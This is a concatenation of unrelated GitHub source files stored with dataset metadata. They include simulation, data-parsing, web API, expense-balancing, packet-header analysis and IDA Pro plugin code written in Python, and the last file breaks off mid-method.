recipe","repo_name":"mgarcia4609/AI-La-Carte","sub_path":"models/recipe_assistant.py","file_name":"recipe_assistant.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30850790369","text":"from PyCamellia import *\nfrom SolutionFns import *\n\nspaceDim = 2\ndims = [1.0,1.0]\nnumElements = [2,2]\npolyOrder = 3\ndt = 0.1\ntotalTime = 2.0\n\nform = transientLinearInit(spaceDim, dims, numElements, polyOrder, dt)\n\ntopBoundary = SpatialFilter.matchingY(1.0)\nnotTopBoundary = SpatialFilter.negatedFilter(topBoundary)\ntimeRamp = TimeRamp.timeRamp(form.getTimeFunction(),1.0)\nx = Function.xn(1)\nrampWidth = 1./64\nH_left = Function.heaviside(rampWidth)\nH_right = Function.heaviside(1.0-rampWidth);\nramp = (1-H_right) * H_left + (1./rampWidth) * (1-H_left) * x + (1./rampWidth) * H_right * (1-x)\n\nzero = Function.constant(0)\ntopVelocity = Function.vectorize(ramp,zero)\n\n\nform = addWall(form, notTopBoundary)\nform = addInflow(form, topBoundary, timeRamp * topVelocity)\n\nform = transientLinearSolve(form, totalTime, dt)\n","repo_name":"kellybreedlove/phase2","sub_path":"transientLinearTest.py","file_name":"transientLinearTest.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30320731318","text":"from sys import argv\nimport json\nimport time\n\nfrom utils.raw_obj.raw_obj import get_raw_obj\nfrom utils.parsers.parse_obj import parse_raw_obj\n\nINPUT = argv[1] + '.tsv'\n\nprint('Input: ', INPUT)\n\nOUTPUT_REVISIONS = \"revisions.json\"\nOUTPUT_PAGES = \"pages.json\"\nOUTPUT_USERS = \"users.json\"\n\nprint('Start: ', time.time())\n\nwith open(INPUT, 'r') as file, open(OUTPUT_REVISIONS, 'w') as revisions, open(OUTPUT_PAGES, 'w') as pages, open(OUTPUT_USERS, 'w') as users:\n for line in file:\n remove_newline = line[0:(len(line) - 1)]\n parts = remove_newline.split('\\t')\n raw_obj = get_raw_obj(parts)\n (type, result) = parse_raw_obj(raw_obj)\n if type == 'revision':\n revision = json.dumps(result)\n revisions.write(revision)\n revisions.write('\\n')\n elif type == 'page':\n page = json.dumps(result)\n pages.write(page)\n pages.write('\\n')\n elif type == 'user':\n user = json.dumps(result)\n users.write(user)\n users.write('\\n')\n\nprint('Finish: ', time.time())\n","repo_name":"WikiCommunityHealth/wikimedia-history-import","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26616082083","text":"N, D, H = map(int, input().split())\nans = 0\n\n\ndef f(x_, y_, x=0):\n y = (y_ - H) * (x - D) / (x_ - D) + H\n return y\n\n\nfor i in range(N):\n d, h = map(int, input().split())\n ans = max(ans, f(d, h))\n\n\nprint(f\"{ans:.20f}\")\n","repo_name":"mei28/Competitive-programing","sub_path":"zone2021/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26493792151","text":"#!/usr/bin/env nix-shell\n#!nix-shell update-shell.nix -i python3\n\n# format:\n# $ nix run nixpkgs.python3Packages.black -c black update.py\n# type-check:\n# $ nix run nixpkgs.python3Packages.mypy -c mypy update.py\n# linted:\n# $ nix run nixpkgs.python3Packages.flake8 -c flake8 --ignore E501,E265,E402 update.py\n\nimport inspect\nimport os\nimport sys\nfrom typing import List, Tuple\nfrom pathlib import Path\n\n# Import plugin update library from maintainers/scripts/pluginupdate.py\nROOT = Path(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))) # type: ignore\nsys.path.insert(\n 0, os.path.join(ROOT.parent.parent.parent.parent.parent, \"maintainers\", \"scripts\")\n)\nimport pluginupdate\n\nGET_PLUGINS = f\"\"\"(with import {{}};\nlet\n inherit (kakouneUtils.override {{}}) buildKakounePluginFrom2Nix;\n generated = callPackage {ROOT}/generated.nix {{\n inherit buildKakounePluginFrom2Nix;\n }};\n hasChecksum = value: lib.isAttrs value && lib.hasAttrByPath [\"src\" \"outputHash\"] value;\n getChecksum = name: value:\n if hasChecksum value then {{\n submodules = value.src.fetchSubmodules or false;\n sha256 = value.src.outputHash;\n rev = value.src.rev;\n }} else null;\n checksums = lib.mapAttrs getChecksum generated;\nin lib.filterAttrs (n: v: v != null) checksums)\"\"\"\n\nHEADER = \"# This file has been generated by ./pkgs/applications/editors/kakoune/plugins/update.py. Do not edit!\"\n\nclass KakouneEditor(pluginupdate.Editor):\n\n\n def generate_nix(self, plugins: List[Tuple[pluginupdate.PluginDesc, pluginupdate.Plugin]], outfile: str):\n sorted_plugins = sorted(plugins, key=lambda v: v[1].name.lower())\n\n with open(outfile, \"w+\") as f:\n f.write(HEADER)\n f.write(\n \"\"\"\n{ lib, buildKakounePluginFrom2Nix, fetchFromGitHub, overrides ? (self: super: {}) }:\nlet\npackages = ( self:\n{\"\"\"\n )\n for pluginDesc, plugin in sorted_plugins:\n f.write(\n f\"\"\"\n {plugin.normalized_name} = buildKakounePluginFrom2Nix {{\n pname = \"{plugin.normalized_name}\";\n version = \"{plugin.version}\";\n src = {pluginDesc.repo.as_nix(plugin)};\n meta.homepage = \"{pluginDesc.repo.url(\"\")}\";\n }};\n\"\"\"\n )\n f.write(\n \"\"\"\n});\nin lib.fix' (lib.extends overrides packages)\n\"\"\"\n )\n print(f\"updated {outfile}\")\n\n\ndef main():\n editor = KakouneEditor(\"kakoune\", ROOT, GET_PLUGINS)\n editor.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NixOS/nixpkgs","sub_path":"pkgs/applications/editors/kakoune/plugins/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":13695,"dataset":"github-code","pt":"37"} +{"seq_id":"5571410456","text":"import argparse\nimport sys\nimport MySQLdb\nimport MySQLdb.cursors\nimport logging\n\ndb\t\t\t= MySQLdb.connect( host=\"127.0.0.1\", port=3306, user=\"root\",\n passwd=\"root\", db=\"watchman\",\n cursorclass=MySQLdb.cursors.DictCursor )\n\nconn\t\t\t= db.cursor()\n\ndef split_data():\n get_query\t\t= \"\"\"select * from chronicle\"\"\"\n conn.execute( get_query )\n\n query\t\t= conn.fetchall()\n \n for data in query:\n data_split\t\t= data['intro_text'].split('\\n\\n', 1)\n chron_id \t\t= int( data['id'] )\n title\t\t\t= data['title']\n intro\t\t\t= data_split[ 0 ]\n try:\n # Update the 'intro_text'\n update_intro\t= \"\"\"update chronicle set `intro_text` = %s where id = '%s' \"\"\"\n conn.execute( update_intro, ( intro, chron_id ))\n db.commit()\n\n # Remove the
from the 'full_text'\n # new_ftext\t\t= ''.join( data_split )\n # update_full\t\t= \"\"\"update chronicle set `full_text` = %s where id = '%s' \"\"\"\n # conn.execute( update_full, ( new_ftext, chron_id ))\n # db.commit()\n \n except MySQLdb.IntegrityError:\n logging.warn(\"failed to update values %d, %s\", chronicle_id, title )\n\nsplit_data()\n\n# Useful scripts not yet implemented automatically >>>\n\n# update chronicle set `intro_text` = replace(`intro_text`, \"

\", \"

\");\n# update chronicle set `intro_text` = concat(`intro_text`, \"

\");\n\n# update chronicle set `intro_text` = null\n\n","repo_name":"WatchmanOnTheWall/watchman","sub_path":"data-split.py","file_name":"data-split.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26444037751","text":"import json\nimport logging\n\nfrom pynamodb.exceptions import DeleteError, DoesNotExist\n\n\n# TODO add pagination\n# TODO return just the columns needed, vs everything; use an index\ndef ls(model):\n \"\"\"Return all of the organizations in the DB.\"\"\"\n results = model.scan()\n print(results)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps({'items': [dict(r) for r in results]})\n }\n\n\n# TODO don't add dupe\ndef create(model, body):\n entry = model(**body)\n entry.save()\n\n return {\n 'statusCode': 201\n }\n\n\n# TODO make use of the batch operations\n# https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchWriteItem.html\n# def create_many(model, body):\n# with model.batch_write() as batch:\n# entry = model(**body)\n# batch.save(entry)\n#\n# return {\n# 'statusCode': 201\n# }\n\n\ndef retrieve(model, key):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(dict(entry))\n }\n\n\n# TODO check for duplicate org name + fail\ndef update(model, key, body):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n keys_changed = False\n fields_changed = False\n\n for k in entry:\n if k in body and body[k] != entry[k]:\n setattr(entry, k, body[k])\n fields_changed = True\n\n # If there are new fields, perform the update\n for k in body:\n if k == 'id': # This assumes that 'id' is the only Dynamo primary key\n keys_changed = True\n if k not in entry:\n setattr(entry, k, body[k])\n fields_changed = True\n\n if fields_changed:\n entry.save()\n if keys_changed:\n delete(model, key)\n else:\n logging.info('Nothing changed, not updating')\n\n return {\n 'statusCode': 200\n }\n\n\ndef delete(model, key):\n try:\n entry = model.get(hash_key=key)\n except DoesNotExist:\n return {\n 'statusCode': 404,\n 'body': json.dumps({'error_message': f\"'{key}' not found\"})\n }\n\n try:\n entry.delete()\n except DeleteError:\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error_message': f\"Unable to delete '{key}'\"})\n }\n\n return {\n 'statusCode': 204\n }\n","repo_name":"good-emporium/web-api","sub_path":"functions/dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21522448781","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Script to balance expenses among a group of people.\n\nProvided a list of 'persons' and a list of 'positions', this script shows the\naccounts stating the individuals total contribution. To even out the balances\na suggestion of money transfer is provided.\n\nThis script can be called upon a json file providing the two data sets.\nSee the README.txt for more information on the data format.\n\"\"\"\n# -----------------------------------------------------------------------------\n# The full license is in the file LICENSE, distributed with this code.\n#\n# REFERENCES:\n# https://github.com/strohmch/moneyhandler\n# -----------------------------------------------------------------------------\n\nimport json\nimport sys\n\ncurrency = \"EUR\"\n\n\ndef calc_accounts(persons, positions):\n \"\"\"Calculates the persons' accounts with due positions (sorted).\"\"\"\n\n balances = [0] * len(persons)\n\n for pos in positions:\n assert len(persons) == len(pos)\n\n # persons obligated to contribute\n con = [i for i, c in enumerate(pos) if c >= 0]\n\n # total expense on position\n expense = sum(pos[i] for i in con)\n\n share = expense / len(con)\n\n # calculate balance\n for i in con:\n balances[i] += pos[i] - share\n\n # sort the persons according to their balances from dept to claim\n accounts = sorted(zip(persons, balances), key=lambda x: x[1])\n\n return accounts\n\n\ndef suggested_actions(accounts):\n \"\"\"Suggests actions to balance sorted accounts.\"\"\"\n\n # the following algorithm provides a suggestion of how to balance the accounts\n persons_s, balances_s = zip(*accounts)\n baltmp = list(balances_s)\n\n # the actions of transactions are stored here\n actions = []\n\n for i in range(len(baltmp)):\n if not baltmp[i] < 0:\n break\n\n for j in range(len(baltmp) - 1, i, -1):\n if not baltmp[j] > 0:\n continue\n\n if baltmp[j] + baltmp[i] >= 0:\n bal_to_trans = baltmp[i]\n else:\n bal_to_trans = -baltmp[j]\n\n actions.append([i, j, -bal_to_trans])\n baltmp[i] -= bal_to_trans\n baltmp[j] += bal_to_trans\n\n if baltmp[i] == 0:\n break\n\n return actions\n\n\ndef main(filename):\n \"\"\"Main script running on jason file named \"filename'\"\"\"\n\n # read the json file with input data\n with open(filename, mode=\"r\") as f:\n data = json.load(f)\n\n # calculate the according sorted accounts\n accounts = calc_accounts(data['persons'], data['positions'])\n\n for pers, bal in accounts:\n print(f'{pers}: {bal:.2f} {currency}')\n print(\"=\" * 80)\n\n # obtain suggested actions\n actions = suggested_actions(accounts)\n\n persons_s = list(zip(*accounts))[0]\n\n for i, j, bal in actions:\n print(f'{persons_s[i]} transfers to {persons_s[j]}: {bal:.2f} {currency}')\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > 1:\n json_filename = sys.argv[1]\n else:\n json_filename = \"2020_summer_vacation.json\"\n print(f\"Got no input, using the example json file: {json_filename}\")\n\n main(json_filename)\n","repo_name":"strohmch/moneyhandler","sub_path":"moneyhandler.py","file_name":"moneyhandler.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33847060385","text":"from fastapi import FastAPI, Depends\nfrom keycloak import KeycloakOpenID\nfrom fastapi.security import OAuth2PasswordBearer\nfrom fastapi.middleware.cors import CORSMiddleware\n\n# psql -U userpd -W dbesiee(database name), then enter password\n# \\dt : show all tables\n# TABLE tablename(or select * from tablename) : show all records of table\nfrom models.database import BaseSQL, engine, SessionLocal\nfrom models import models\nfrom routers import user, movie\nfrom services import movie as movie_service\n\napp = FastAPI()\n\n\n# front url\norigins = [\n \"http://localhost\",\n \"http://localhost:5050\",\n \"http://localhost:5050/#/movie/list\",\n \"http://localhost:5050/#/movie/search\",\n \"http://localhost:5050/#/\",\n]\n\n# fastapi allow cross-domain\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World_first\"}\n\n\napp.include_router(user.router)\napp.include_router(movie.router)\n\n\n@app.on_event(\"startup\")\nasync def startup_event():\n BaseSQL.metadata.create_all(bind=engine)\n db = SessionLocal()\n try:\n db.query(models.movie_model).delete()\n db.commit()\n except:\n db.rollback()\n movie_service.store_to_db(db=db, filename='imdb_movies.csv')\n\n\n# # authentication\n# oauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"token\")\n#\n# # Configure client\n# keycloak_openid = KeycloakOpenID(server_url=\"http://localhost:8080/auth/\",\n# client_id=\"fastapi\",\n# realm_name=\"master\",\n# client_secret_key=\"be49e1f0-922d-4c06-8f61-d5ad3a46f896\")\n#\n#\n# @app.get(\"/protected\", tags=[\"authentication\"])\n# def protected(token: str = Depends(oauth2_scheme)):\n# return {\n# \"Hello\": \"World\",\n# \"user_infos\": token\n# }\n\n","repo_name":"xul-ops/DSIA_projet_fullstack_application","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7829947907","text":"from cta_db import datastructures as cta\nfrom copy import deepcopy\nimport pickle\nimport datetime as dt\nimport platform\n\na1 = cta.animal('RN5')\na1.dob = dt.datetime.strptime('10/10/18','%m/%d/%y')\n\na1.add_pre_op('Handling',date = '3/9/19 13:00')\na1.add_pre_op('Handling',date = '3/10/19 13:30')\na1.add_pre_op('Box Habituation',date = '3/11/19 13:00')\na1.add_pre_op('Box Habituation','He hates it','3/12/19 14:00')\n\ns1 = cta.mouse_surgery('BLA_cre_implant',pre_weight=34.2,post_weight=36,date='3/13/19',num_ch=31)\na1.add_surgery(s1)\n\ni1 = cta.ioc_test('Habituation')\ni1.set_test_time('3/22/19 13:30')\ni1['Weight'] = 33.2\ni1.calibration([8],[18.8])\na1.add_ioc_test(i1)\n\ni2 = cta.ioc_test('Taste Array')\ni2.set_test_time('3/23/19 13:30')\ni2['Weight'] = 31.4\ni2.calibration([8,9,9,7],[18.4,19.6,20,18.8])\ni2.set_rec_info('RN5_4taste_preCTA_190323',cta.ioc_test.rec_defaults['array'])\na1.add_ioc_test(i2)\n\ni3 = cta.ioc_test('CTA Train')\ni3.set_test_time('3/24/19 13:00')\ni3['Weight'] = 31.3\ni3.calibration([8],[19.1])\ni3.set_rec_info('RN5_ctaTrain_190324')\ni3.set_injection_details('13:30',0.56)\na1.add_ioc_test(i3)\n\ni4 = deepcopy(i2)\ni4.set_test_time('3/25/19 14:00')\ni4.set_rec_info('RN5_4taste_postCTA_190325')\ni4.calibration([8,9,9,7],[18.4,19.8,19.6,18])\na1.add_ioc_test(i4)\n\ni5 = cta.ioc_test('CTA Test')\ni5.set_test_time('3/25/19 12:30')\ni5['Weight'] = 30.8\ni5.set_rec_info('RN5_SaccTest_190325')\ni5.calibration([8],[18.6])\na1.add_ioc_test(i5)\n\na1.add_bottle_test(55.6,54.7,'3/20/19 20:00')\na1.add_bottle_test(60.1,59.0,'3/21/19 20:00')\na1.add_bottle_test(62.2,61.3,'3/22/19 20:00')\na1.add_bottle_test(58.4,57.9,'3/23/19 20:00')\na1.add_bottle_test(54.7,54.1,'3/24/19 20:30','Saccharin 0.2M')\n\na2 = deepcopy(a1)\na2.ID='RN6'\na2.surgery[0].add_comment('Gave 0.5cc Ringers after')\na2.surgery[0].add_comment('Super active an hour after')\n\ntmp_path = 'data/'\nf1 = tmp_path+'RN5_metadata.p'\nwith open(f1,'wb') as f:\n pickle.dump(a1,f)\nwith open(f1.replace('5','6'),'wb') as f:\n pickle.dump(a2,f)\nanim_db = {platform.node():{a1.ID:tmp_path+'RN5_metadata.p',a2.ID:tmp_path+'RN6_metadata.p'}}\nwith open('data/cta_anim_db.p','wb') as f:\n pickle.dump(anim_db,f)\n","repo_name":"nubs01/CTA_ExpDB","sub_path":"tests/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7884877777","text":"\ndef overlap_area(rect_1, rect_2):\n x_start = max(rect_1[0][0], rect_2[0][0])\n x_end = min(rect_1[1][0], rect_2[1][0])\n\n if x_start >= x_end:\n return 0\n\n y_start = max(rect_1[0][1], rect_2[0][1])\n y_end = min(rect_1[1][1], rect_2[1][1])\n\n if y_start >= y_end:\n return 0\n\n return (x_end - x_start) * (y_end - y_start)\n\nif __name__ == \"__main__\":\n rect_1 = [[2, 2], [4, 4]]\n rect_2 = [[5, 2], [8, 4]]\n print(overlap_area(rect_1, rect_2))\n","repo_name":"pkrishn6/problems","sub_path":"api/rect.py","file_name":"rect.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12158375869","text":"import variables\n\n\ndef analyse():\n variables.ethernet_header = variables.pack_con[0:14]\n variables.ip_header = variables.pack_con[14:34]\n type_judge = variables.pack_con[23]\n if type_judge == '06':\n variables.tcp_header = variables.pack_con[34:54]\n elif type_judge == '11':\n variables.udp_header = variables.pack_con[34:42]\n\n variables.des_mac_addr = ':'.join(str(b) for b in variables.ethernet_header[0:6])\n variables.src_mac_addr = ':'.join(str(b) for b in variables.ethernet_header[6:12])\n variables.protocol_type = ':'.join(str(b) for b in variables.ethernet_header[12:14])\n variables.ip_version = ''\n if variables.ip_header[0] == '45':\n variables.ip_version = '4'\n else:\n variables.ip_version = '6'\n variables.ip_header_length = '20'\n\n variables.diff_service = variables.ip_header[1]\n variables.ip_total_length = str(int(variables.ip_header[2] + variables.ip_header[3], 16))\n variables.ip_identification = variables.ip_header[4] + variables.ip_header[5]\n variables.ip_flags = variables.ip_header[6]\n variables.ip_header_check_sum = \"0x\" + variables.ip_header[10] + variables.ip_header[11]\n variables.ip_alive_time = str(int(variables.ip_header[8], 16))\n if variables.ip_header[9] == \"06\":\n variables.ip_in_trans_protocol = \"TCP\"\n else:\n variables.ip_in_trans_protocol = \"UDP\"\n\n variables.ip_src_ip_adrr = '.'.join(str(int(con, 16)) for con in variables.ip_header[12:16])\n variables.ip_des_ip_adrr = '.'.join(str(int(con, 16)) for con in variables.ip_header[16:20])\n if variables.ip_in_trans_protocol == \"TCP\":\n variables.tcp_src_port = str(int(variables.tcp_header[0] + variables.tcp_header[1], 16))\n variables.tcp_des_port = str(int(variables.tcp_header[2] + variables.tcp_header[3], 16))\n variables.tcp_serial_num = str(\n int(variables.tcp_header[4] + variables.tcp_header[5] + variables.tcp_header[6] + variables.tcp_header[7],\n 16))\n variables.tcp_ack_num = str(\n int(variables.tcp_header[8] + variables.tcp_header[9] + variables.tcp_header[10] + variables.tcp_header[11],\n 16))\n\n bin_str = \"{0:b}\".format(int(variables.tcp_header[12] + variables.tcp_header[13]), 16)\n\n variables.tcp_header_length = str(int(bin_str[0:4], 2)) + bin_str[0:4]\n variables.tcp_reserved_segment = bin_str[4:10]\n\n variables.tcp_identification = bin_str[10:16]\n variables.tcp_window_size = str(int(variables.tcp_header[8] + variables.tcp_header[9], 16))\n variables.tcp_check_sum = \"0x\" + variables.tcp_header[10] + variables.tcp_header[11]\n variables.tcp_urg_pointer = variables.tcp_header[12] + variables.tcp_header[13]\n variables.tcp_opt_segment = ''\n\n\n elif variables.ip_in_trans_protocol == \"UDP\":\n variables.udp_src_port = str(int(variables.udp_header[0] + variables.udp_header[1], 16))\n variables.udp_des_port = str(int(variables.udp_header[2] + variables.udp_header[3], 16))\n variables.udp_length = str(int(variables.udp_header[4] + variables.udp_header[5], 16))\n variables.udp_check_sum = \"0x\" + variables.udp_header[6] + variables.udp_header[7]\n\n\ndef connect_info():\n ethernet_info = \"-------------------------------帧信息-------------------------------\\n\" + \"源MAC地址:\" + variables.src_mac_addr + \"\\n目的MAC地址:\" + variables.des_mac_addr + \"\\n协议类型:\" + variables.protocol_type\n tcp_info = \"\"\n udp_info = \"\"\n type_judge = variables.pack_con[23]\n ip_info = \"\\n---------------------------- IP头部信息-----------------------------\\n\" + \"IP头部长度:\" + variables.ip_header_length + \\\n \"\\nIP版本号:\" + variables.ip_version + \"\\n区分服务: \" + \\\n variables.diff_service + \"\\nIP数据包总长度:\" + variables.ip_total_length + \"\\n标识位:\" + variables.ip_identification + \\\n \"\\n标志:\" + variables.ip_flags + \"\\n首部校验和:\" + variables.ip_header_check_sum + \"\\n生存时间:\" + variables.ip_alive_time + \\\n \"\\n传输层协议:\" + variables.ip_in_trans_protocol + \"\\n源IP地址:\" + variables.ip_src_ip_adrr + \"\\n目的IP地址:\" + variables.ip_des_ip_adrr\n\n if variables.ip_in_trans_protocol == \"TCP\":\n tcp_info = \"\\n----------------------------传输层协议信息--------------------------\\n\" + \"协议类型: TCP\\n\" + \\\n \"源端口号: \" + variables.tcp_src_port + \"\\n目的端口号: \" + variables.tcp_des_port + \\\n \"\\n序列号: \" + variables.tcp_serial_num + \"\\n确认号: \" + variables.tcp_ack_num + \\\n \"\\nTCP头部长: \" + variables.tcp_header_length + \"\\n保留字段: \" + variables.tcp_reserved_segment + \\\n \"\\n标志位: \" + variables.tcp_identification + \"\\n窗口大小: \" + variables.tcp_window_size + \\\n \"\\n校验和: \" + variables.tcp_check_sum + \"\\n紧急指针: \" + variables.tcp_urg_pointer + \\\n \"\\n选项字段: \" + variables.tcp_opt_segment\n variables.trans_layer_protocl = tcp_info\n elif variables.ip_in_trans_protocol == \"UDP\":\n udp_info = \"\\n----------------------------传输层协议信息--------------------------\\n\" + \"协议类型: UDP\\n\" + \\\n \"源端口号: \" + variables.udp_src_port + \"\\n目的端口号: \" + variables.udp_des_port + \"\\n长度: \" + variables.udp_length + \\\n \"\\nUDP校验和: \" + variables.udp_check_sum\n variables.trans_layer_protocl = udp_info\n variables.analyse_info = ethernet_info + ip_info + variables.trans_layer_protocl\n","repo_name":"GokiePeter/UCAS-Software-and-System-Security-Network-Sniffer","sub_path":"analyse_data.py","file_name":"analyse_data.py","file_ext":"py","file_size_in_byte":5635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43361450437","text":"import time, threading\nimport sqlite3 as sq\nimport os\nimport inspect\nimport glob\nimport idaapi\nfrom idc import print_insn_mnem, get_screen_ea\nfrom ida_kernwin import ask_long, find_widget, close_widget, ask_str\n\n\ninitialized = False\ninsref_g = None\n# we try because of ida versions below 6.8, and write action handlers below\ntry:\n\n class StopHandler(idaapi.action_handler_t):\n def __init__(self):\n idaapi.action_handler_t.__init__(self)\n\n def activate(self, ctx):\n b = idaref_plugin_t()\n b.stop()\n return 1\n\n # This action is always available.\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\nexcept AttributeError:\n pass\n\ntry:\n\n class StartHandler(idaapi.action_handler_t):\n def __init__(self):\n idaapi.action_handler_t.__init__(self)\n\n def activate(self, ctx):\n b = idaref_plugin_t()\n b.start()\n return 1\n\n # This action is always available.\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n\nexcept AttributeError:\n pass\n\n\nclass InstructionReference(idaapi.simplecustviewer_t):\n def __init__(self, owner):\n super(InstructionReference, self).__init__()\n self.owner = owner\n self.ref_term = False\n self.inst_map = {}\n self.last_inst = None\n self.is_loaded = False\n self.do_auto = True\n\n self.menu_update = None\n self.menu_lookup = None\n self.menu_autorefresh = None\n self.change_arch = None\n\n self.title = \"Instruction Reference\"\n self.destroying = False\n\n self.base_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n\n self.archs = self.findManuals()\n\n print(\"available architectures %s\" % str(self.archs))\n\n self.create()\n self.loadArchitecture(self.getIdaArchitecture())\n\n def create(self):\n if find_widget(self.title) == None:\n if not idaapi.simplecustviewer_t.Create(self, self.title):\n print(\"Unable to open\")\n return False\n\n if idaapi.IDA_SDK_VERSION >= 700:\n self.menu_update = 1\n self.menu_lookup = 2\n self.menu_autorefresh = 3\n self.change_arch = 4\n\n class Hooks(idaapi.UI_Hooks):\n class PopupActionHandler(idaapi.action_handler_t):\n def __init__(self, owner, menu_id):\n self.owner = owner\n self.menu_id = menu_id\n\n def activate(self, ctx):\n self.owner.OnPopupMenu(self.menu_id)\n\n def update(self, ctx):\n return idaapi.AST_ENABLE_ALWAYS\n\n def __init__(self, form):\n idaapi.UI_Hooks.__init__(self)\n self.form = form\n\n def finish_populating_widget_popup(self, widget, popup):\n if self.form.title == idaapi.get_widget_title(widget):\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None, \"Update View\", self.PopupActionHandler(self.form, self.form.menu_update), None, None, -1\n ),\n )\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Lookup Instruction\",\n self.PopupActionHandler(self.form, self.form.menu_lookup),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Toggle Auto-refresh\",\n self.PopupActionHandler(self.form, self.form.menu_autorefresh),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_action_to_popup(widget, popup, \"-\", None)\n idaapi.attach_dynamic_action_to_popup(\n widget,\n popup,\n idaapi.action_desc_t(\n None,\n \"Change Architecture\",\n self.PopupActionHandler(self.form, self.form.change_arch),\n None,\n None,\n -1,\n ),\n )\n idaapi.attach_action_to_popup(widget, popup, \"-\", None)\n\n self.hooks = Hooks(self)\n self.hooks.hook()\n else:\n self.menu_update = self.AddPopupMenu(\"Update View\")\n self.menu_lookup = self.AddPopupMenu(\"Lookup Instruction\")\n self.menu_autorefresh = self.AddPopupMenu(\"Toggle Auto-refresh\")\n self.change_arch = self.AddPopupMenu(\"Change Architecture\")\n\n self.Show()\n\n def update():\n if self.destroying == True:\n return -1\n else:\n if self.do_auto:\n self.update()\n\n return 200\n\n if \"register_timer\" in dir(idaapi):\n idaapi.register_timer(200, update)\n\n self.is_loaded = True\n else:\n print(\"Sorry I can't support auto-refresh in your version of IDA.\")\n print(\"Use 'ref.update()' to get documentation for your instruction.\")\n else:\n print(\"Already loaded. Please close old instance first.\")\n\n def destroy(self):\n self.destroying = True\n self.is_loaded = False\n self.hooks.unhook()\n window = find_widget(self.title)\n\n if window:\n close_widget(window, 0)\n\n def findManuals(self):\n search_path = os.path.join(self.base_path, \"archs\", \"*.sql\")\n doc_opts = glob.glob(search_path)\n\n if len(doc_opts) == 0:\n Warning(\"Couldn't find any databases in \" + search_path)\n return\n\n available = []\n\n for c in doc_opts:\n basefile = os.path.splitext(os.path.basename(c))[0]\n available.append(basefile)\n\n return available\n\n def askArchitecture(self, availList):\n prompt = [\"What platform do you want to use?\"]\n\n i = 1\n for arch in availList:\n prompt.append(\"%d - %s\" % (i, arch))\n i = i + 1\n\n sel = ask_long(1, \"\\n\".join(prompt))\n\n if sel is None:\n return None\n\n sel = int(sel)\n\n if sel > 0 and sel <= len(availList):\n return availList[sel - 1]\n\n return None\n\n def loadArchitecture(self, name):\n # fix up name\n name = name.lower()\n if name == \"metapc\":\n name = \"x86-64\"\n\n self.arch = name\n\n path = self.base_path\n dbpath = os.path.join(path, \"archs\", name + \".sql\")\n\n if not os.path.isfile(dbpath):\n print(\"Manual not found for architecture: %s\" % name)\n return False\n\n con = sq.connect(\":memory:\")\n con.text_factory = str\n con.executescript(open(dbpath).read())\n\n cur = con.cursor()\n cur.execute(\"SELECT mnem, description FROM instructions\")\n con.commit()\n\n rows = cur.fetchall()\n for row in rows:\n inst = row[0]\n lines = row[1].replace(\"\\r\\n\", \"\\n\").split(\"\\n\")\n\n self.inst_map[inst] = lines\n\n con.close()\n\n for (inst, data) in self.inst_map.items():\n data = data[0]\n\n if data[0:3] == \"-R:\":\n ref = data[3:]\n\n if ref in self.inst_map:\n self.inst_map[inst] = self.inst_map[ref]\n\n print(\"Manual loaded for architecture: %s\" % name)\n return True\n\n def 